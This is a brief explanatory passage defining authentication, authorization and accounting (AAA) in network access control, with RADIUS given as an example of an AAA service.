Authentication is the process of identifying an individual, usually based on a username and
password. Authentication is based on the idea that each individual user will have unique
information that sets him or her apart from other users.
Authorization is the process of granting or denying a user access to network resources once
the user has been authenticated through the username and password. The amount of
information and the amount of services the user has access to depend on the user's
authorization level.
Accounting is the process of keeping track of a user's activity while accessing the network
resources, including the amount of time spent in the network, the services accessed while
there and the amount of data transferred during the session. Accounting data is used for
trend analysis, capacity planning, billing, auditing and cost allocation.
AAA services often require a server that is dedicated to providing the three services. RADIUS
is an example of an AAA service.